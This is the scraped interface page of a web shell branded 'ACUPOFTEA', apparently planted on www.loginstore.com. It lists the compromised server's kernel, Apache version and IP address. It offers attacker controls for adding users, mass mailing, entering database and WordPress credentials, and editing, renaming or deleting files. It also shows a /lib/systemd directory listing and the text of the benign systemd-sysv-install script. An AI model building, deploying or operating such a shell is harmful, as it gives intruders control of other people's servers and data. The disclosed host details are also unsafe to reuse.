System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
200.10.71.112
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
systemd
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
systemd-sysv-install
#!/bin/sh # This script is called by "systemctl enable/disable" when the given unit is a # SysV init.d script. It needs to call the distribution's mechanism for # enabling/disabling those, such as chkconfig, update-rc.d, or similar. This # can optionally take a --root argument for enabling a SysV init script # in a chroot or similar. set -eu usage() { echo "Usage: $0 [--root=path] enable|disable|is-enabled <sysv script name>" >&2 exit 1 } ROOT= # parse options eval set -- "$(getopt -o r: --long root: -- "$@")" while true; do case "$1" in -r|--root) ROOT="$2" shift 2 ;; --) shift ; break ;; *) usage ;; esac done NAME="${2:-}" run() { if [ -n "$ROOT" ] && [ "$ROOT" != "/" ]; then _SKIP_SYSTEMD_NATIVE=1 chroot "$ROOT" /usr/sbin/update-rc.d "$@" else _SKIP_SYSTEMD_NATIVE=1 /usr/sbin/update-rc.d "$@" fi } [ -n "$NAME" ] || usage case "$1" in enable) # call the command to enable SysV init script $NAME here.. run "$NAME" defaults run "$NAME" enable ;; disable) run "$NAME" defaults run "$NAME" disable ;; is-enabled) # exit with 0 if $NAME is enabled, non-zero if it is disabled ls "$ROOT"/etc/rc[S5].d/S??"$NAME" >/dev/null 2>&1 ;; *) usage ;; esac
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
..
DIR
-
drwxr-xr-x
2026-07-13 04:58:15
boot
DIR
-
drwxr-xr-x
2024-02-16 06:44:25
catalog
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
logind.conf.d
DIR
-
drwxr-xr-x
2024-02-16 06:53:44
network
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
ntp-units.d
DIR
-
drwxr-xr-x
2026-06-08 06:00:10
system
DIR
-
drwxr-xr-x
2026-07-27 07:22:37
system-environment-generators
DIR
-
drwxr-xr-x
2026-07-22 11:33:31
system-generators
DIR
-
drwxr-xr-x
2026-07-22 11:33:31
system-preset
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
system-shutdown
DIR
-
drwxr-xr-x
2026-07-09 08:22:23
system-sleep
DIR
-
drwxr-xr-x
2024-02-16 06:53:44
user
DIR
-
drwxr-xr-x
2026-07-22 11:33:31
user-environment-generators
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
user-generators
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
user-preset
DIR
-
drwxr-xr-x
2026-06-08 06:00:11
libsystemd-shared-249.so
application/x-sharedlib
2.71 MB
-rw-r--r--
2026-06-05 03:40:28
lxd-agent-setup
text/x-shellscript
896 B
-rwxr-xr-x
2022-03-04 09:14:02
resolv.conf
text/plain
710 B
-rw-r--r--
2022-03-11 12:48:49
systemd
application/x-pie-executable
1.76 MB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-ac-power
application/x-pie-executable
14.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-backlight
application/x-pie-executable
30.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-binfmt
application/x-pie-executable
18.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-bless-boot
application/x-pie-executable
30.47 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-boot-check-no-failures
application/x-pie-executable
14.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-cgroups-agent
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-cryptsetup
application/x-pie-executable
58.55 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-fsck
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-fsckd
application/x-pie-executable
30.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-growfs
application/x-pie-executable
22.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-hibernate-resume
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-hostnamed
application/x-pie-executable
42.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-initctl
application/x-pie-executable
22.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-journald
application/x-pie-executable
158.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-localed
application/x-pie-executable
50.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-logind
application/x-pie-executable
258.51 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-makefs
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-modules-load
application/x-pie-executable
18.47 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-network-generator
application/x-pie-executable
34.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-networkd
application/x-pie-executable
1.44 MB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-networkd-wait-online
application/x-pie-executable
34.5 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-pstore
application/x-pie-executable
22.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-quotacheck
application/x-pie-executable
14.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-random-seed
application/x-pie-executable
22.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-remount-fs
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-reply-password
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-resolved
application/x-pie-executable
478.42 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-rfkill
application/x-pie-executable
22.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-shutdown
application/x-pie-executable
46.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-sleep
application/x-pie-executable
26.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-socket-proxyd
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-sulogin-shell
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-sysctl
application/x-pie-executable
22.47 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-sysv-install
text/x-shellscript
1.33 KB
-rwxr-xr-x
2026-03-23 02:55:19
systemd-time-wait-sync
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-timedated
application/x-pie-executable
46.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-timesyncd
application/x-pie-executable
54.22 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-udevd
application/x-pie-executable
1.08 MB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-update-utmp
application/x-pie-executable
18.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-user-runtime-dir
application/x-pie-executable
22.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-user-sessions
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-veritysetup
application/x-pie-executable
22.4 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-volatile-root
application/x-pie-executable
18.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-xdg-autostart-condition
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2026-06-05 03:40:28
~ ACUPOFTEA - www.loginstore.com